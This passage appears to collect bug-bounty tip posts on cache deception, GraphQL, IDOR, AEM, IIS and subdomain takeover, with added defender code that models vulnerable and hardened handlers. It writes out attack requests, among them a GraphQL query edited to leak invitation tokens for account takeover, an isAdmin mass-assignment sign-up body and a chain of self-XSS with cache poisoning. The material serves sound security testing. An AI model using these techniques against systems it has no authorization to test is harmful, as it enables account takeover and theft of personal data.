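    """Fire `requests` concurrent claims and return how many were accepted."""
    successes = []
    guard = threading.Lock()

    def worker():
        ok = claim_fn(path, user_id, day, limit)
        with guard:
            successes.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(successes)


def stored_claims(path: str, user_id: int, day: str) -> int:
    """What the database actually recorded for the user/day pair."""
    conn = sqlite3.connect(path)
    row = conn.execute(
        "SELECT claims FROM bonus_claims WHERE user_id = ? AND day = ?", (user_id, day)
    ).fetchone()
    conn.close()
    return row[0] if row else 0
```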
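The daily-bonus scenario from the post above, as an added defender's example that is not the author's code: a check-then-act claim handler next to one that makes the check and the write atomic, both hit with a burst of 50 simultaneous claims of the kind Turbo Intruder sends. The BonusLedger class and its in-memory store are constructed stand-ins for a real "claimed today" table.

```python
import threading
import time


class BonusLedger:
    """Constructed in-memory stand-in for a 'claimed today' table."""

    def __init__(self):
        self._claims = {}            # (user_id, day) -> bonuses granted
        self._lock = threading.Lock()

    def claim_naive(self, user_id, day, window=0.05):
        """Vulnerable pattern: read the row, decide, then write.

        Every request that reads the row before the first write lands sees
        'not yet claimed' and grants a bonus. `window` stands in for the
        latency between the SELECT and the INSERT/UPDATE in a real app.
        """
        key = (user_id, day)
        if self._claims.get(key, 0) >= 1:
            return False
        time.sleep(window)
        self._claims[key] = self._claims.get(key, 0) + 1
        return True

    def claim_atomic(self, user_id, day):
        """Hardened pattern: check and write happen under one lock.

        In a database this is a UNIQUE(user_id, day) constraint, a
        conditional UPDATE ... WHERE claimed = 0, or SELECT ... FOR UPDATE;
        only one of the concurrent requests can win.
        """
        key = (user_id, day)
        with self._lock:
            if self._claims.get(key, 0) >= 1:
                return False
            self._claims[key] = 1
            return True

    def granted(self, user_id, day):
        return self._claims.get((user_id, day), 0)


def burst(claim_fn, user_id, day, n=50):
    """Fire n claims as simultaneously as the interpreter allows.

    A Barrier releases every thread at once, mirroring a gated burst on the
    wire; returns how many of the n claims were granted.
    """
    go = threading.Barrier(n)
    results = []
    out_lock = threading.Lock()

    def worker():
        go.wait()
        ok = claim_fn(user_id, day)
        with out_lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(1 for r in results if r)


def demo():
    """Returns (bonuses granted by the naive handler, by the atomic handler)."""
    naive = BonusLedger()
    hardened = BonusLedger()
    return (burst(naive.claim_naive, "user-1", "2024-01-01"),
            burst(hardened.claim_atomic, "user-1", "2024-01-01"))


if __name__ == "__main__":
    n, a = demo()
    print(f"naive handler granted {n} bonuses, atomic handler granted {a}")
```

The same burst is a cheap regression test for any "once per period" endpoint: anything other than exactly one success is a finding.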
🔐Bug Bounty Tips: How to Identify and exploit Akamai Cache Deception/Poisoning Issues?
1️⃣ Assuming you're navigating an Akamai site and spot headers like cdn-cache; desc=MISS or cdn-cache; desc=HIT or any other headers Indicating a cache HIT, you're in luck! 🍀
2️⃣ Alternatively, try adding extensions like js, jpeg, php, css, woff2, etc., e.g., https://target(.)com/api/v1/users/self/.css?cachebuster, to see if you get a HIT.
3️⃣ Next, hunt for parameters, headers, cookies, etc., on all pages to find any reflecting ones.
4️⃣ It's almost impossible to do this manually at a wide scale. Therefore, you must use the Param Miner Burp Suite extension: send your request for parameter mining and select "Guess Everything!" This will try to identify all reflective headers, cookies, and parameters.
5️⃣ Test the identified parameters for Self-XSS Issues. Once you've identified vulnerable parameters, headers, or cookies, you must then exploit these along with Cache Poisoning or Cache Deception.
6️⃣ Alternatively, if you don't want to go the XSS route, check if you can use cache deception to exfiltrate sensitive user tokens or PII data too by caching a sensitive page that leaks the user's session token or other PII data, or you can try to go for DoS too.
7️⃣ Assuming you're going with the XSS route, chain the Self-XSS with Cache Poisoning/Deception and convert that into a 0-interaction ATO.
8️⃣ Create a PoC video demonstrating the attack scenario, i.e., cache a page with your payload, then demonstrate that the cached content with your payload is being served when accessed via Chrome Incognito or some other browser, and submit your report to win some nice bounties! 🎥💰
#BugBounty #Akamai #CacheDeception #SecurityTips #Infosec #BugBountyTips #HackerOne #BugCrowd
Note - Same concept applies to other CDNs too.
🐛 Bug Bounty Tips: Unlocking GraphQL's Hidden Potential 🌐 When it comes to GraphQL, it's easy to assume that all operations are accessible through a target app's functionality. But by limiting your research, you might miss out on valuable opportunities. Today, I'll share steps to expand your attack surface on GraphQL target apps, gaining a competitive advantage in finding and reporting security issues that could lead to some rewarding bounties!
1️⃣ Identifying GraphQL Targets: Start by identifying GraphQL targets using the powerful Nuclei scanner: nuclei -l <targetlist.txt> -t graphql-detect.yaml
You can find the nuclei template at raw.githubusercontent.com/pr…
2️⃣ Retrieve the GraphQL Schema for hidden Queries/Mutations: If Introspection is enabled, you can obtain the GraphQL Schema, revealing hidden GraphQL Operations and Mutations, using the following GraphQL Query:
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
3️⃣ Visualize with GraphQL Voyager: To visualize the GraphQL Schema effectively and craft your attack vector, use GraphQL Voyager—a powerful tool to help you navigate the schema: graphql-kit.com/graphql-voya…
4️⃣ Retrieve Hidden Queries and Mutations: Retrieve GraphQL Queries and Mutations from JavaScript files when Introspection is disabled. These files may list hidden methods not accessible via the app's regular functionality. Try making direct requests to these.
5️⃣ Craft Your Attack: Craft your attack using the identified GraphQL Queries and Mutations. These methods are often vulnerable to various bug classes, including IDOR, RBAC, Race Condition, SQL, and more.
If you can't find more GraphQL Queries and Mutations, don't worry! Stay tuned for upcoming insights on how to brute force and discover hidden ones.
Takeaways: Don't hit a dead end with GraphQL apps. Dive deeper, find those concealed GraphQL Queries and Mutations, and unlock unimaginable functionalities that can lead to significant bounties! 💰🔐 #Cybersecurity #BugBounty #GraphQL #HackingTips #InfoSec #Hackerone #Bugcrowd #GraphQL #SecurityTips #BugBountyTips
🕵️‍♂️ Show & Tell: Here's how I exploited a simple Issue on a target app using GraphQL that allowed me to take over any user's account 💰💰 This is a classic case of thinking outside the "box." The app I targeted allowed inviting users to your organization. When an invite is sent to the victim, they get a link like http://targetapp/invitation/{token}. What was interesting was that the invitation link automatically logged a victim into their account and asked them if they wanted to accept the invitation. 🚨 This grabbed my attention, prompting the question, "Can I somehow acquire that Invitation token?" Considering its potential to let me take over any person's account, I immediately delved deeper into the app and came across a GraphQL operation for retrieving the list of invited users:
{"operationName":"GetPendingMembers","variables":{"ID":"XXXX"},"query":"query GetPendingMembers($ID: ID!) {\n users: GetPendingMembers(ID: $ID) {\n invited { email\n role\n createdAt\n updatedAt\n __typename\n }\n __typename\n }\n}\n"}
Looking at this, I thought, "What if the 'invited' object has more info than shown?" So, I added the token parameter inside the invited object:
{"operationName":"GetPendingMembers","variables":{"ID":"XXXX"},"query":"query GetPendingMembers($ID: ID!) {\n users: GetPendingMembers(ID: $ID) {\n invited {\n token email\n role\n createdAt\n updatedAt\n __typename\n }\n __typename\n }\n}\n"}
Surprisingly, it worked! The GraphQL operation returned the token that was sent to the victim's email. I crafted a URI with the leaked token, like http://targetapp/invitation/{token}, and took over the victim's account.
Lesson: Always think outside the box. Instead of just hunting for vulnerabilities, notice odd app behaviors— they might lead you to unexpected weaknesses. Understand how the app works, find flaws, and outsmart the design.
👾 #BugBounty #AppSecurity #ThinkOutsideTheBox #HackerOne #BugBountyTips #SecurityTips #BugCrowd #InfoSec #Bounties #Bounty #Tips #Follow
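Added example serving both the GraphQL tips post (steps 2 and 4) and the invitation-token write-up above; it is not the author's code and the introspection result it walks is constructed, not taken from any real target. It lists every query and mutation the server exposes, subtracts the operation names seen in the client JS to get the "hidden" ones, and flags fields whose names suggest secrets, which is how a defender would have caught a `token` field sitting on an invited-user type before it shipped.

```python
import json

# Constructed introspection result, shaped like what the __schema query in
# the post returns (abridged to the parts this example walks).
INTROSPECTION = json.loads("""
{"data": {"__schema": {
  "queryType": {"name": "Query"},
  "mutationType": {"name": "Mutation"},
  "types": [
    {"kind": "OBJECT", "name": "Query", "fields": [
      {"name": "GetPendingMembers", "isDeprecated": false},
      {"name": "GetOrganization", "isDeprecated": false},
      {"name": "ExportAllUsers", "isDeprecated": true}]},
    {"kind": "OBJECT", "name": "Mutation", "fields": [
      {"name": "InviteUser", "isDeprecated": false},
      {"name": "SetUserRole", "isDeprecated": false}]},
    {"kind": "OBJECT", "name": "InvitedUser", "fields": [
      {"name": "email", "isDeprecated": false},
      {"name": "role", "isDeprecated": false},
      {"name": "token", "isDeprecated": false},
      {"name": "createdAt", "isDeprecated": false}]},
    {"kind": "SCALAR", "name": "String", "fields": null}
  ]}}}
""")

# Operation names the front-end JavaScript was observed issuing (constructed).
OBSERVED_IN_JS = {"GetPendingMembers", "GetOrganization", "InviteUser"}

# Substrings that usually mean a field hands out a credential.
SENSITIVE_FIELD_HINTS = ("token", "secret", "password", "apikey", "otp")


def operations(schema):
    """Return {root type name: [field names]} for the query and mutation roots."""
    roots = {}
    for role in ("queryType", "mutationType"):
        root = schema.get(role)
        if not root:
            continue
        for t in schema["types"]:
            if t["name"] == root["name"]:
                roots[t["name"]] = [f["name"] for f in t.get("fields") or []]
    return roots


def hidden_operations(schema, observed):
    """Operations reachable on the server but never issued by the client.

    Deprecated operations are included because the query in the post asks
    for includeDeprecated:true, and deprecated usually still means callable.
    """
    return {root: sorted(set(names) - observed)
            for root, names in operations(schema).items()}


def sensitive_fields(schema):
    """(type, field) pairs whose names hint at secrets the API may return."""
    hits = []
    for t in schema["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        for f in t.get("fields") or []:
            if any(h in f["name"].lower() for h in SENSITIVE_FIELD_HINTS):
                hits.append((t["name"], f["name"]))
    return hits


if __name__ == "__main__":
    schema = INTROSPECTION["data"]["__schema"]
    print("hidden operations:", hidden_operations(schema, OBSERVED_IN_JS))
    print("sensitive fields:", sensitive_fields(schema))
```

Run the same two functions over a real introspection dump to get the review list for a schema audit; every hidden operation needs an authorization check and every flagged field needs a reason to exist in the response.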
Bug Bounty Tips: Discover associated domains for your target organization with Reverse WHOIS Search
Working on a wide-scope target and aiming to gather as many associated domains as possible? Here's a free service that can provide you with all the domains linked to a target organization, significantly increasing your chances of finding untouched assets for quick wins! Here's how to access this valuable information:
1️⃣ Sign up at tools.whoisxmlapi.com/
2️⃣ Visit tools.whoisxmlapi.com/revers…, enter the registrant organization, phone, or email, and click "Search."
3️⃣ The service will provide you with a list of targets associated with that organization. Begin manual hunting on these targets and/or add them to your automation target list to secure some bounties!
#BugBountyTips #SecurityTips #HackerOne #BugCrowd #Recon #OSINT 🕵️‍♂️🎯🔍
🤔Question of the Day: How to tackle unpredictable IDs in IDOR or RBAC Issues? I've reported 50+ Issues relying on HASH/UUIDs, and surprisingly, duplicates have been rare. It seems many are hesitant to report these for fear of them being labeled "Informative" or "N/A." But today, let's explore how you can approach these Issues and increase your chances of acceptance. Here's how to unearth UUIDs and transform your IDOR/RBAC Issues into reportable gems:
1️⃣ Sign Up and Forgot Password Page: If you've discovered a service reliant on a user's account UUID, try signing up or using forgot password with a victim's email. The server might leak the UUID in the error response, e.g., "Error": "User Already Registered." "ID: "UUID" or "Message": "Verification Email Sent" "ID: "UUID"
2️⃣ Intentionally Exceed Rate Limits on Login: Deliberately trigger more user-specific errors by exceeding rate limits. Sometimes, server-side functions expose the UUID in responses. For instance, failing multiple login attempts may reveal the UUID when the response mentions an account lockout, e.g., "Error": "User Account Locked Out." "ID: "UUID"
3️⃣ User-Interactive Features: Keep an eye out for features like Add Friend, Search User, Chat, Invite User, or Follow User. These often enable you to interact with other users, and as a result, the UUID of the user might be exposed in responses.
4️⃣ Archived URLs with Unpredictable IDs: Explore leaked unpredictable IDs using Wayback, Waymore, or use Google Dorking to hunt for archived links or URLs related to the target app.
5️⃣ Target Apps with Multiple Roles: If your target app supports multiple roles (e.g., Admin, Team Member), and you've identified improper access control issues, you're in luck. Team members within the same organization might have access to all target app components, along with the UUIDs within the same tenant. Make sure to highlight this in your report.
6️⃣ Predictable Patterns: Are you kidding me? No, I am not. I've worked on target apps that had predictable ID patterns. People ignore these patterns because the moment someone sees complex IDs, they tend to get nervous. However, it is important that you generate multiple IDs on the object you're working on and make note of the ID patterns. I've noticed patterns like 3fd537eea0e7d425943be204, which at a glance looks complex. But I generated a couple more, e.g., 3fd537eea0e7d425943be121, 3fd537eea0e7d425943ba404, 3fd537eea0e7d425943be934. Doesn't look complex anymore, does it?
7️⃣ Search Your Own Unpredictable UUIDs/Hashes: Look for your own UUID / unpredictable ID in your Burp Suite HTTP traffic for additional requests/responses where these IDs are inadvertently leaked. You may end up finding a request that can be used for accessing other users' UUIDs too.
Can't seem to crack the unpredictable ID puzzle? Don't worry! These are still reportable security risks, albeit considered "High" complexity, potentially resulting in "Lower" payouts. Nevertheless, don't disregard them. Depending on your rapport with the program, consider submitting one and see if it gets accepted. At worst, it may be labeled as "Informative."
Takeaway: Don't shy away from testing issues tied to unpredictable IDs. Always seek ways to reverse engineer or expose these complex IDs through alternative methods, and be prepared to earn some extra cash! 💰🕵️‍♂️ #BugBounty #Cybersecurity #HackingTips
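Step 6 above, as an added example that is not from the original post: it takes the four sample IDs quoted there and measures how much of each ID actually varies, which is the check to run against your own ID generator before calling its output "unguessable". A uuid4 sample is included for contrast; `effective_bits` is an upper bound on per-position hex entropy, not a cryptographic measurement, and with only a handful of samples a position can look fixed by chance, so collect more before concluding.

```python
import math
import uuid

# The IDs quoted in the post.
SAMPLE_IDS = [
    "3fd537eea0e7d425943be204",
    "3fd537eea0e7d425943be121",
    "3fd537eea0e7d425943ba404",
    "3fd537eea0e7d425943be934",
]


def common_prefix(ids):
    """Longest prefix shared by every ID in the sample."""
    first, rest = ids[0], ids[1:]
    n = 0
    while n < len(first) and all(len(i) > n and i[n] == first[n] for i in rest):
        n += 1
    return first[:n]


def varying_positions(ids):
    """Character indexes at which at least two sampled IDs differ."""
    width = min(len(i) for i in ids)
    return [p for p in range(width) if len({i[p] for i in ids}) > 1]


def analyze(ids, alphabet_size=16):
    """Summarise how much of the ID space an attacker would have to search.

    effective_bits assumes every varying position can take any symbol of the
    alphabet; positions that never change contribute nothing because an
    attacker who has seen one ID already knows them.
    """
    if len({len(i) for i in ids}) != 1:
        raise ValueError("IDs in a sample should all have the same width")
    prefix = common_prefix(ids)
    varying = varying_positions(ids)
    bits_per_symbol = math.log2(alphabet_size)
    return {
        "width": len(ids[0]),
        "fixed_prefix": prefix,
        "fixed_prefix_len": len(prefix),
        "varying_positions": varying,
        "effective_bits": len(varying) * bits_per_symbol,
        "nominal_bits": len(ids[0]) * bits_per_symbol,
    }


def uuid4_sample(n=4):
    """Random v4 UUIDs (hyphens stripped) for comparison; note that index 12
    is the fixed version nibble, so even uuid4 is not 128 free bits."""
    return [uuid.uuid4().hex for _ in range(n)]


if __name__ == "__main__":
    for name, sample in (("post", SAMPLE_IDS), ("uuid4", uuid4_sample())):
        r = analyze(sample)
        print(f"{name}: {r['fixed_prefix_len']}/{r['width']} chars fixed, "
              f"~{r['effective_bits']:.0f} of {r['nominal_bits']:.0f} bits vary")
```

For the post's sample the 24-character ID nominally carries 96 bits but only the last four characters move, so the search space is about 16 bits, well inside brute-force range.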
🔍Question of the day: How can you uncover and exploit AEM issues successfully? I've reported over 50+ AEM issues, with rewards ranging from $500 to $7500 based on their impact. AEM stands as a widely used product across many bug bounty targets, often falling within the in-scope category. Regrettably, due to a lack of awareness, many individuals fail to delve beyond basic checks on these targets, unknowingly passing up on lucrative opportunities!
🎯Common AEM Issues: XSS, AEM Dispatcher bypass, SSRF, Information disclosure, and more.
Here's my step-by-step approach to finding and exploiting AEM issues:
1️⃣ Identifying AEM Targets: Use a dedicated nuclei template found here: https://github[.]com/projectdiscovery/nuclei-templates/blob/main/http/technologies/aem-detect.yaml
2️⃣ Nuclei Template for AEM Detection: Run the command: nuclei -u http://target[.]com -t aem-detect.yaml
3️⃣ Common Vulnerabilities Scanning: After shortlisting AEM targets, search for common vulnerabilities with: nuclei -u http://target[.]com -tags aem, which executes all AEM-specific templates.
4️⃣ Fuzzing: Fuzzing is a very important step. You can use the wordlist from https://github[.]com/clarkvoss/AEM-List/blob/main/paths to fuzz commonly known misconfigurations.
5️⃣ AEM Hacker Tool: Explore misconfigurations with the excellent tool at https://github[.]com/0ang3el/aem-hacker. Run it using: python3 aem_hacker.py -u https://yourtarget --host your_vps_hostname_ip_for_ssrf_checks
Just by performing these basic checks, you should be able to find a couple of security issues (XSS, Dispatcher Bypass, etc.)
🤷‍♂️Nothing worked? Don't worry! Stay tuned for more ideas in our upcoming tweets! 💡
Takeaways: Past failures don't dictate future success. Ensure AEM checks are on your checklist, go beyond basic tests, and witness surprising results! 🙏 Thanks! 💼💻 #BugBounty #AEM #CyberSecurity #InfoSecTips #HackerOne #BugCrowd #BugBountyTips #SecurityTips #nuclei
I’ve noticed that most new folks who reach out for guidance in bug bounty feel overwhelmed early on trying to learn everything at once. That often leads to half-baked knowledge across multiple areas and slower overall progress. Here's what I recommend instead 👇
1/ Pick one vulnerability type and go all in. Master the ins and outs of that category - how it works, how it breaks, real-world examples, and ways to find it. Once you’ve got depth in one area, the rest will follow naturally.
2/ To put this into perspective, here’s a snapshot of the types of issues I’ve reported over the last 5 years - gradually expanding focus as I grew more confident:
2020:
• Local cache issues
• Rate limit issues on Login
• Session invalidation
• MFA bypass
2021:
• Rate limit
• MFA bypass
• CSRF
• IDOR
• RBAC
2022:
• CSRF
• IDOR
• RBAC
• XSS
• Business logic
• Info disclosure
2023:
• Everything from 2022 +
• BBP automation
• Cache deception
• DoS Issues
• Subdomain takeover
• Auth bypass / misconfig
• SQLi
• SSRF
• RCE
2024:
• Everything from 2023 +
• AI-related issues
• Vhost misconfigurations
2025:
• Everything from 2024 +
• Many more new things that I will talk about soon :)
3/ There are more, of course, but this covers most of what’s worked well for me. The key takeaway: you don’t need to know everything. Play to your strengths. Stay consistent. And let your scope expand naturally. Hope this helps someone starting out 💪
Bug Bounty Tips: Struggling to find interesting stuff while hunting on an app? 🕵️‍♂️ Consider searching for old leftover API endpoints that might still work because they haven't been turned off or are used in older app versions. Here are 5 places to look for these APIs:
1️⃣ JS files: Check JS files for hidden APIs. Collect all APIs and focus on the ones that the app doesn't use. Test them for known issues.
2️⃣ Archived Links: Use tools like Waymore to get archived links. Look for weird links and test them for issues.
3️⃣ Archived JS files: Download old JS files using Waymore and get API endpoints from those. Older app versions might still have active and vulnerable APIs.
4️⃣ Android/iOS Mobile App: The mobile app might not be part of the bounty program, but its underlying API could be. Intercept app traffic using tools like Burp Suite, MITM, or Charles Proxy and check for interesting APIs.
5️⃣ Outdated Mobile Apps: Install old APKs and extract API endpoints from the Java source code for manual testing.
Lesson: Don't give up too soon. If you're determined, explore all options—you might just find a bug others missed. 🐞💡 #BugBountyTips #SecurityTips #HackerOne #BugCrowd #InfoSec #StayMotivated
🔍 Question of the day: How can you effectively exploit Windows IIS targets? 🖥️ These targets are frequently underestimated, often dismissed due to the static blue screen they present. However, exploring these assets can often lead to substantial bounties, ranging from $500 to $5000, depending on their impact! 💰 Here are the steps to approach these targets:
1️⃣ Fingerprinting IIS - Start by using Nuclei to detect IIS servers. Check out this simple template: raw.githubusercontent.com/pr…
2️⃣ Shortname Scanner - Use the simple SNS (Shortname Scanner) to scan for folders and files. This user-friendly tool, developed by @sw33tLie, can be found here: github.com/sw33tLie/sns. If you locate a folder, you can reuse the same tool on that path recursively to detect subfolders, files, and more.
3️⃣ Leverage AI Power - Check out another tool, utilizing OpenAI, created by @monkehack, which predicts shortnames to help you deduce the full file and folder names: github.com/projectmonke/shor…
4️⃣ Exploitation - Once you've determined the full file or folder name, navigate to it for further exploitation. Here's an excellent tutorial from the legend himself @infosec_au talking about how to approach IIS targets: piped.video/watch?v=HrJW6Y9k…
Lesson: Don't disregard Windows IIS targets just because they appear uninteresting. Misconfigurations are often overlooked and can lead to valuable bounties! 💡💻💰 #hackerone #bugcrowd #cybersecuritytips #bugbountytips #followformore #infosec #tips #security 🔒👨‍💻
🤖 Question of the day: How to set up Discord/Slack notifications for bug bounty findings? Looking to enhance your automation workflow? Ideally, you should have Discord/Slack/Telegram notifications configured for your bug bounty automation to get instant alerts on critical findings and take immediate action. Here's a step-by-step guide on setting up these notifications on Discord/Slack:
1️⃣ Go to github.com/projectdiscovery/… and install the tool with the following command: go install -v github[.]com/projectdiscovery/notify/cmd/notify@latest
2️⃣ Set up a configuration file using the provided example in the notify repository. Save it as $HOME/.config/notify/provider-config.yaml, and use the custom webhook URL generated from Discord/Slack for your notification channel.
3️⃣ Assuming you've created a channel named "sub-monitoring" on Discord, you can send notifications using piped (stdin) output. For example, for subfinder: subfinder -d hackerone[.]com | notify -id "sub-monitoring"
You can do the same for other tools. Here's an example for nuclei: nuclei -l targets.txt -t newtemplates.yaml | notify -id "daily-monitoring"
Feel free to reach out if you have any questions. #BugBountyTips #HackerOne #BugCrowd #SecurityTips #InfoSec 🐛🔍🛡️
Bug Bounty Tips: 🐛 Working on a wide-scope target and need to quickly pinpoint interesting assets for your security assessment? Here's a nifty one-liner to help you do just that:
1️⃣ Create a list of your target/subdomains in 'targets.txt'.
2️⃣ Use the 'httpx' tool with the '-mr' flag to search for specific keywords. For example, you can look for the term 'register' in the responses using a command like: cat targets.txt | httpx -mr "register"
🔍 What happens next? You'll get a list of assets where the keyword 'register' appears in the HTTP responses. These assets often lead to registration or sign-up pages. Exploring these can reveal security vulnerabilities waiting to be discovered.
⚙️ Want to take it a step further? Build your custom keyword lists, including terms like 'login,' 'signup,' 'admin', and more. Tailor your searches to uncover assets of interest quickly.
🚀 I've used this simple yet effective technique countless times on expansive scopes to gain an edge in bug hunting. Stay proactive and stay secure! 💡💻 #CyberSecurity #bugbountytips #hackerone #bugcrowd #Infosec
🔒 Bug Bounty Insight: Uncovering Overlooked Vulnerabilities. If you're working on a target that offers user invitations via an invitation link, you might be surprised by how often these simple issues go unnoticed and unreported. In my early days, I reported over 10+ similar issues to programs, earning me quick wins and $$$! Here's how you can turn this feature into a reportable security issue:
1️⃣ Generate an invitation link and send it to your secondary account to join the team.
2️⃣ Accept the invitation.
3️⃣ Remove the secondary user from the team.
4️⃣ Try to rejoin the organization using the same invitation link, and prepare to be amazed!
This issue allows an individual to rejoin the organization with the same role, even after removal. If the invitation link has no expiry and is not revoked on removal, it poses a security risk, granting access back to the organization with the same privileges as before.
Takeaway: Simple issues often hide in plain sight. Get a little creative, and you'll uncover vulnerabilities all around you. Happy hunting! 💡💰 #BugBounty #Cybersecurity #HackingTips #HackerOne #BugCrowd #InfoSec #SecurityTips
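The four-step replay above, as an added example that is not the author's code: a constructed invitation service with the behaviour the post describes (links never expire, are never consumed, and survive member removal) next to a hardened version where a link is single-use, time-limited, and revoked when the member is removed. The class, addresses and TTL are all assumptions made for the example.

```python
import secrets
import time


class InvitationService:
    """Constructed model of team invitations (not any real product's code)."""

    TTL_SECONDS = 7 * 24 * 3600          # a link is honoured for one week

    def __init__(self, clock=time.time):
        self._clock = clock
        self._invites = {}               # token -> {email, role, expires, used}
        self.members = {}                # email -> role

    def invite(self, email, role):
        token = secrets.token_urlsafe(32)
        self._invites[token] = {"email": email, "role": role,
                                "expires": self._clock() + self.TTL_SECONDS,
                                "used": False}
        return token

    # --- the behaviour described in the post --------------------------------
    def accept_vulnerable(self, token):
        """Any known token grants membership, every time it is presented."""
        inv = self._invites.get(token)
        if inv is None:
            return False
        self.members[inv["email"]] = inv["role"]
        return True

    def remove_member_vulnerable(self, email):
        """Drops the member but leaves their invitation on file."""
        self.members.pop(email, None)

    # --- hardened ------------------------------------------------------------
    def accept_hardened(self, token):
        """Single use and time limited; a consumed or expired link is dead."""
        inv = self._invites.get(token)
        if inv is None or inv["used"] or self._clock() > inv["expires"]:
            return False
        inv["used"] = True
        self.members[inv["email"]] = inv["role"]
        return True

    def remove_member_hardened(self, email):
        """Removal also revokes every invitation issued to that address."""
        self.members.pop(email, None)
        for token in [t for t, i in self._invites.items() if i["email"] == email]:
            del self._invites[token]


def replay_after_removal(mode):
    """Run the four steps from the post.

    Returns (first accept ok, replay after removal ok, user is a member again).
    """
    svc = InvitationService()
    if mode == "vulnerable":
        accept, remove = svc.accept_vulnerable, svc.remove_member_vulnerable
    else:
        accept, remove = svc.accept_hardened, svc.remove_member_hardened
    email = "secondary@example.test"
    token = svc.invite(email, "member")              # step 1: generate link
    first = accept(token)                            # step 2: accept
    remove(email)                                    # step 3: remove the user
    replay = accept(token)                           # step 4: reuse the link
    return first, replay, email in svc.members


def expired_link_rejected():
    """Hardened accept refuses a link presented after its TTL (fake clock)."""
    now = [1_000_000.0]
    svc = InvitationService(clock=lambda: now[0])
    token = svc.invite("late@example.test", "member")
    now[0] += InvitationService.TTL_SECONDS + 1
    return not svc.accept_hardened(token)


if __name__ == "__main__":
    print("vulnerable:", replay_after_removal("vulnerable"))
    print("hardened:  ", replay_after_removal("hardened"))
```

Marking the invite used at step 2 alone already defeats the replay; revoking on removal covers the separate case of a pending link that was never accepted before the user was removed.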
🕵️ Bug Bounty Tips: How to maximize your bug bounty gains with a single finding? Found a cool issue on a website you're testing, like a hidden file or a tricky setup? 🎯 Don't just stop at reporting it once. If you don't search for the same problems on other target sites, you might be missing out on extra rewards! Here's the deal: Create a little script or a nuclei template for the issue you found, and use it on all your other targets to look for the same kind of problems. You'll be amazed at how often these issues pop up, and you can get paid multiple times for the same discoveries. I've done this before and reported more than 10 issues for the same problem on a program affecting multiple sites and also on different targets with the same issue that earned me multiple rewards.
What's the reporting strategy?
1️⃣ If all the issues are on the same target, report one and wait for them to fix it. They might see it as the same problem and close the others as duplicates.
2️⃣ Once they fix the first one, check if the other targets still have the problem. If they do, report those too.
3️⃣ Keep repeating steps 1 and 2!
Bottom line: Turn your special findings, like unique files, lists of words, or tricky setups, into a pattern or script. Use it on all your targets to get the most rewards for your discoveries. 🚀💰 #BugBounty #InfoSec #Automation #Cybersecurity #BugBountyTips #HackerOne #BugCrowd
Question of the day: What subdomain takeover possibilities still exist? 🤔 Searching for subdomain takeovers? While they may not be as prevalent nowadays, it's crucial to keep these on your checklist as a handful of opportunities still exist. Here are the most common subdomain takeovers you should watch for:
S3 Bucket Takeover 📦
Shopify Site Takeover 🛍️
EC2 Takeovers 🌐
DNS Zone Takeovers 🌐
*.trafficmanager[.]net - Edge Case 🌐
*.cloudapp[.]net 🌐
*.elasticbeanstalk[.]com - Edge case (Must have a region without a random string) 🌐
*.cloudapp.azure[.]com 🌐
*.azureedge[.]net - Edge case 🌐
*.herokuapp[.]com - Edge case 🌐
*.azurewebsites[.]net 🌐
While there may be a few more out there, these are the most common ones I've encountered, so I'm sharing this list with you. 🌐🔍 #BugBounty #SubdomainTakeover #SecurityTips #Infosec #BugBountyTips #HackerOne #BugCrowd
Show & Tell: Here's how I managed to escalate my role to an internal admin, leading to a critical bounty! 🚀 Can you imagine the possibilities if you could tweak data within your profile or objects beyond the usual application flow? You're absolutely right—lots of bugs await discovery!!! Here's how I successfully elevated my role to an internal admin, exposing admin functionalities, resulting in a mass PII leak and access to other sensitive internal reports:
1️⃣ Navigated to target[.]com and accessed the sign-up page to create an account.
2️⃣ The sign-up page accepted three parameters: name, email address, and password.
3️⃣ As a practice, I closely monitored responses from critical functions to spot anything intriguing. Upon successful registration, here's the server's response: {"success": true, "user_id": 123, "name": "xxx", "email": "xxx@example.com", "isAdmin": false}
4️⃣ What would you do if you saw a response like that? You guessed it right!
5️⃣ Returned to the sign-up form, registered for a new account, and intercepted the following request during sign-up: {"name": "xxx", "email": "xxx@example.com", "password": "pass"}
6️⃣ Injected an additional parameter, "isAdmin": true, to test if the application would process it. Modified my request body to: {"name": "xxx", "email": "xxx@example.com", "password": "pass", "isAdmin": true}
7️⃣ BAM! The server processed my account as an admin, making me an internal admin and revealing significant administrative functionality.
Takeaways: Always scrutinize critical app requests/responses for anomalies. Don't hesitate to spend an extra minute testing the basics—you might be pleasantly surprised by the results! 💡🐛💰 #cybersecurity #bugbounty #bugbountytips #hackerone #bugcrowd #infosec
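The sign-up flow above, as an added example that is not the author's code and models no real product: a generic "bind every JSON key to the model" handler that honours a client-supplied isAdmin, next to an allow-list handler that never reads privilege flags from the request and records unexpected keys for monitoring. The User model, field map and placeholder password hash are assumptions made for the example.

```python
import hashlib
import json
from dataclasses import dataclass


@dataclass
class User:
    name: str
    email: str
    password_hash: str
    is_admin: bool = False


def hash_password(password):
    # Placeholder only; real sign-up code uses a slow, salted hash (argon2/bcrypt).
    return hashlib.sha256(password.encode()).hexdigest()


# JSON key -> model attribute. The vulnerable binder also accepts any key
# that is not in this map and sets it on the model verbatim.
FIELD_MAP = {"name": "name", "email": "email", "isAdmin": "is_admin"}


def register_vulnerable(body_json):
    """Generic binder (mass assignment): whatever the client sends lands on the model."""
    body = json.loads(body_json)
    user = User(name="", email="", password_hash=hash_password(body.pop("password")))
    for key, value in body.items():
        setattr(user, FIELD_MAP.get(key, key), value)
    return user


ALLOWED_SIGNUP_FIELDS = {"name", "email", "password"}


def register_hardened(body_json, audit=None):
    """Explicit allow-list: privilege flags are never read from the request.

    Unknown keys are dropped and, when `audit` is given, recorded so that a
    burst of sign-ups carrying isAdmin shows up as a tampering signal.
    """
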